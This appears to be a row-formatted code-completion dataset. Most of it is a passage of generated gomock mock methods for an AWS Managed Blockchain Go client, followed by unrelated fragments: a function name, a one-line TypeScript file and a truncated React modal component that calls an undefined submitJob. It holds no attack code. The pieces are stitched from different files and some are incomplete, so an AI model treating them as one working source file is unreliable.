return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesPages), arg0, arg1)
}
// ListNodesPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListNodesInput, arg2 func(*managedblockchain.ListNodesOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNodesPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListNodesPagesWithContext indicates an expected call of ListNodesPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesPagesWithContext), varargs...)
}
// ListNodesRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesRequest(arg0 *managedblockchain.ListNodesInput) (*request.Request, *managedblockchain.ListNodesOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNodesRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListNodesOutput)
return ret0, ret1
}
// ListNodesRequest indicates an expected call of ListNodesRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesRequest), arg0)
}
// ListNodesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesWithContext(arg0 context.Context, arg1 *managedblockchain.ListNodesInput, arg2 ...request.Option) (*managedblockchain.ListNodesOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNodesWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListNodesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNodesWithContext indicates an expected call of ListNodesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodesWithContext), varargs...)
}
// ListProposalVotes mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotes(arg0 *managedblockchain.ListProposalVotesInput) (*managedblockchain.ListProposalVotesOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalVotes", arg0)
ret0, _ := ret[0].(*managedblockchain.ListProposalVotesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposalVotes indicates an expected call of ListProposalVotes.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotes(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotes", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotes), arg0)
}
// ListProposalVotesPages mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesPages(arg0 *managedblockchain.ListProposalVotesInput, arg1 func(*managedblockchain.ListProposalVotesOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalVotesPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalVotesPages indicates an expected call of ListProposalVotesPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesPages), arg0, arg1)
}
// ListProposalVotesPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalVotesInput, arg2 func(*managedblockchain.ListProposalVotesOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalVotesPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalVotesPagesWithContext indicates an expected call of ListProposalVotesPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesPagesWithContext), varargs...)
}
// ListProposalVotesRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesRequest(arg0 *managedblockchain.ListProposalVotesInput) (*request.Request, *managedblockchain.ListProposalVotesOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalVotesRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListProposalVotesOutput)
return ret0, ret1
}
// ListProposalVotesRequest indicates an expected call of ListProposalVotesRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesRequest), arg0)
}
// ListProposalVotesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalVotesWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalVotesInput, arg2 ...request.Option) (*managedblockchain.ListProposalVotesOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalVotesWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListProposalVotesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposalVotesWithContext indicates an expected call of ListProposalVotesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalVotesWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalVotesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalVotesWithContext), varargs...)
}
// ListProposals mocks base method.
func (m *MockManagedBlockchainAPI) ListProposals(arg0 *managedblockchain.ListProposalsInput) (*managedblockchain.ListProposalsOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposals", arg0)
ret0, _ := ret[0].(*managedblockchain.ListProposalsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposals indicates an expected call of ListProposals.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposals(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposals", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposals), arg0)
}
// ListProposalsPages mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsPages(arg0 *managedblockchain.ListProposalsInput, arg1 func(*managedblockchain.ListProposalsOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalsPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalsPages indicates an expected call of ListProposalsPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsPages), arg0, arg1)
}
// ListProposalsPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalsInput, arg2 func(*managedblockchain.ListProposalsOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalsPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListProposalsPagesWithContext indicates an expected call of ListProposalsPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsPagesWithContext), varargs...)
}
// ListProposalsRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsRequest(arg0 *managedblockchain.ListProposalsInput) (*request.Request, *managedblockchain.ListProposalsOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListProposalsRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListProposalsOutput)
return ret0, ret1
}
// ListProposalsRequest indicates an expected call of ListProposalsRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsRequest), arg0)
}
// ListProposalsWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListProposalsWithContext(arg0 context.Context, arg1 *managedblockchain.ListProposalsInput, arg2 ...request.Option) (*managedblockchain.ListProposalsOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListProposalsWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListProposalsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListProposalsWithContext indicates an expected call of ListProposalsWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListProposalsWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListProposalsWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListProposalsWithContext), varargs...)
}
// ListTagsForResource mocks base method.
func (m *MockManagedBlockchainAPI) ListTagsForResource(arg0 *managedblockchain.ListTagsForResourceInput) (*managedblockchain.ListTagsForResourceOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListTagsForResource", arg0)
ret0, _ := ret[0].(*managedblockchain.ListTagsForResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListTagsForResource indicates an expected call of ListTagsForResource.
func (mr *MockManagedBlockchainAPIMockRecorder) ListTagsForResource(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListTagsForResource", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListTagsForResource), arg0)
}
// ListTagsForResourceRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListTagsForResourceRequest(arg0 *managedblockchain.ListTagsForResourceInput) (*request.Request, *managedblockchain.ListTagsForResourceOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListTagsForResourceRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListTagsForResourceOutput)
return ret0, ret1
}
// ListTagsForResourceRequest indicates an expected call of ListTagsForResourceRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListTagsForResourceRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListTagsForResourceRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListTagsForResourceRequest), arg0)
}
// ListTagsForResourceWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListTagsForResourceWithContext(arg0 context.Context, arg1 *managedblockchain.ListTagsForResourceInput, arg2 ...request.Option) (*managedblockchain.ListTagsForResourceOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListTagsForResourceWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListTagsForResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListTagsForResourceWithContext indicates an expected call of ListTagsForResourceWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListTagsForResourceWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListTagsForResourceWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListTagsForResourceWithContext), varargs...)
}
// RejectInvitation mocks base method.
func (m *MockManagedBlockchainAPI) RejectInvitation(arg0 *managedblockchain.RejectInvitationInput) (*managedblockchain.RejectInvitationOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "RejectInvitation", arg0)
ret0, _ := ret[0].(*managedblockchain.RejectInvitationOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// RejectInvitation indicates an expected call of RejectInvitation.
func (mr *MockManagedBlockchainAPIMockRecorder) RejectInvitation(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "RejectInvitation", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).RejectInvitation), arg0)
}
// RejectInvitationRequest mocks base method.
func (m *MockManagedBlockchainAPI) RejectInvitationRequest(arg0 *managedblockchain.RejectInvitationInput) (*request.Request, *managedblockchain.RejectInvitationOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "RejectInvitationRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.RejectInvitationOutput)
return ret0, ret1
}
// RejectInvitationRequest indicates an expected call of RejectInvitationRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) RejectInvitationRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "RejectInvitationRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).RejectInvitationRequest), arg0)
}
// RejectInvitationWithContext mocks base method.
func (m *MockManagedBlockchainAPI) RejectInvitationWithContext(arg0 context.Context, arg1 *managedblockchain.RejectInvitationInput, arg2 ...request.Option) (*managedblockchain.RejectInvitationOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "RejectInvitationWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.RejectInvitationOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// RejectInvitationWithContext indicates an expected call of RejectInvitationWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) RejectInvitationWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "RejectInvitationWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).RejectInvitationWithContext), varargs...)
}
// TagResource mocks base method.
func (m *MockManagedBlockchainAPI) TagResource(arg0 *managedblockchain.TagResourceInput) (*managedblockchain.TagResourceOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "TagResource", arg0)
ret0, _ := ret[0].(*managedblockchain.TagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// TagResource indicates an expected call of TagResource.
func (mr *MockManagedBlockchainAPIMockRecorder) TagResource(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TagResource", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).TagResource), arg0)
}
// TagResourceRequest mocks base method.
func (m *MockManagedBlockchainAPI) TagResourceRequest(arg0 *managedblockchain.TagResourceInput) (*request.Request, *managedblockchain.TagResourceOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "TagResourceRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.TagResourceOutput)
return ret0, ret1
}
// TagResourceRequest indicates an expected call of TagResourceRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) TagResourceRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TagResourceRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).TagResourceRequest), arg0)
}
// TagResourceWithContext mocks base method.
func (m *MockManagedBlockchainAPI) TagResourceWithContext(arg0 context.Context, arg1 *managedblockchain.TagResourceInput, arg2 ...request.Option) (*managedblockchain.TagResourceOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "TagResourceWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.TagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// TagResourceWithContext indicates an expected call of TagResourceWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) TagResourceWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TagResourceWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).TagResourceWithContext), varargs...)
}
// UntagResource mocks base method.
func (m *MockManagedBlockchainAPI) UntagResource(arg0 *managedblockchain.UntagResourceInput) (*managedblockchain.UntagResourceOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UntagResource", arg0)
ret0, _ := ret[0].(*managedblockchain.UntagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UntagResource indicates an expected call of UntagResource.
func (mr *MockManagedBlockchainAPIMockRecorder) UntagResource(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UntagResource", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UntagResource), arg0)
}
// UntagResourceRequest mocks base method.
func (m *MockManagedBlockchainAPI) UntagResourceRequest(arg0 *managedblockchain.UntagResourceInput) (*request.Request, *managedblockchain.UntagResourceOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UntagResourceRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.UntagResourceOutput)
return ret0, ret1
}
// UntagResourceRequest indicates an expected call of UntagResourceRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) UntagResourceRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UntagResourceRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UntagResourceRequest), arg0)
}
// UntagResourceWithContext mocks base method.
func (m *MockManagedBlockchainAPI) UntagResourceWithContext(arg0 context.Context, arg1 *managedblockchain.UntagResourceInput, arg2 ...request.Option) (*managedblockchain.UntagResourceOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "UntagResourceWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.UntagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UntagResourceWithContext indicates an expected call of UntagResourceWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) UntagResourceWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UntagResourceWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UntagResourceWithContext), varargs...)
}
// UpdateMember mocks base method.
func (m *MockManagedBlockchainAPI) UpdateMember(arg0 *managedblockchain.UpdateMemberInput) (*managedblockchain.UpdateMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateMember", arg0)
ret0, _ := ret[0].(*managedblockchain.UpdateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateMember indicates an expected call of UpdateMember.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateMember), arg0)
}
// UpdateMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) UpdateMemberRequest(arg0 *managedblockchain.UpdateMemberInput) (*request.Request, *managedblockchain.UpdateMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.UpdateMemberOutput)
return ret0, ret1
}
// UpdateMemberRequest indicates an expected call of UpdateMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateMemberRequest), arg0)
}
// UpdateMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) UpdateMemberWithContext(arg0 context.Context, arg1 *managedblockchain.UpdateMemberInput, arg2 ...request.Option) (*managedblockchain.UpdateMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "UpdateMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.UpdateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateMemberWithContext indicates an expected call of UpdateMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateMemberWithContext), varargs...)
}
// UpdateNode mocks base method.
func (m *MockManagedBlockchainAPI) UpdateNode(arg0 *managedblockchain.UpdateNodeInput) (*managedblockchain.UpdateNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateNode", arg0)
ret0, _ := ret[0].(*managedblockchain.UpdateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateNode indicates an expected call of UpdateNode.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateNode), arg0)
}
// UpdateNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) UpdateNodeRequest(arg0 *managedblockchain.UpdateNodeInput) (*request.Request, *managedblockchain.UpdateNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.UpdateNodeOutput)
return ret0, ret1
}
// UpdateNodeRequest indicates an expected call of UpdateNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateNodeRequest), arg0)
}
// UpdateNodeWithContext mocks base method.
func (m *MockManagedBlockchainAPI) UpdateNodeWithContext(arg0 context.Context, arg1 *managedblockchain.UpdateNodeInput, arg2 ...request.Option) (*managedblockchain.UpdateNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "UpdateNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.UpdateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateNodeWithContext indicates an expected call of UpdateNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateNodeWithContext), varargs...)
}
// VoteOnProposal mocks base method.
func (m *MockManagedBlockchainAPI) VoteOnProposal(arg0 *managedblockchain.VoteOnProposalInput) (*managedblockchain.VoteOnProposalOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "VoteOnProposal", arg0)
ret0, _ := ret[0].(*managedblockchain.VoteOnProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// VoteOnProposal indicates an expected call of VoteOnProposal.
func (mr *MockManagedBlockchainAPIMockRecorder) VoteOnProposal(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "VoteOnProposal", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).VoteOnProposal), arg0)
}
// VoteOnProposalRequest mocks base method.
func (m *MockManagedBlockchainAPI) VoteOnProposalRequest(arg0 *managedblockchain.VoteOnProposalInput) (*request.Request, *managedblockchain.VoteOnProposalOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "VoteOnProposalRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.VoteOnProposalOutput)
return ret0, ret1
}
// VoteOnProposalRequest indicates an expected call of VoteOnProposalRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) VoteOnProposalRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "VoteOnProposalRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).VoteOnProposalRequest), arg0)
}
// VoteOnProposalWithContext mocks base method.
func (m *MockManagedBlockchainAPI) VoteOnProposalWithContext(arg0 context.Context, arg1 *managedblockchain.VoteOnProposalInput, arg2 ...request.Option) (*managedblockchain.VoteOnProposalOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "VoteOnProposalWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.VoteOnProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// VoteOnProposalWithContext indicates an expected call of VoteOnProposalWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) VoteOnProposalWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "VoteOnProposalWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).VoteOnProposalWithContext), varargs...)
}
| NewMockManagedBlockchainAPI |
index.ts | export const foo = (x: number): number => x + 1; |
||
SubmitModal.tsx | import React from "react";
import {Input, Modal} from "antd"; |
class SubmitModal extends React.Component {
state = {
loading: false,
json: ""
};
componentDidMount() {
}
onChange(e) {
this.setState({
json: e.target.value
});
}
handleSubmit = async e => {
const {onCancel} = this.props;
try {
this.setState({
loading: true
});
await submitJob(this.state.json);
onCancel();
} finally {
this.setState({
loading: false
});
}
};
handleCancel = e => {
const {onCancel} = this.props;
onCancel();
};
render() {
return (
<Modal
width={1024}
visible
title="创建任务"
onOk={this.handleSubmit}
okText="提交"
confirmLoading={this.state.loading}
onCancel={this.handleCancel}
>
